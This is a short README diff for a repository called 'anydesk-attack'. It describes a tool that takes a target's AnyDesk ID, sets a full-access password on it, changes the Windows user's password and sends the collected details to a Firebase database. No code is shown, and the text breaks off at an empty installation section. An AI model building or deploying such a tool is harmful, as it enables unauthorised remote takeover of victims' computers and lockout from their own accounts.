unrealisticfaces/anydesk-attack/README.md

 Anydesk attack is an automation tool used to grab the anydesk id of the target and sets a password to it

 ## Features
+- Automatically grab the anydesk id and set a full acess password
+- This will also set a new password to the current windows user
 - The info will be sent to the firebase database
-- This will also set the password for the current windows user and perform a restart

 ## Installation
 ```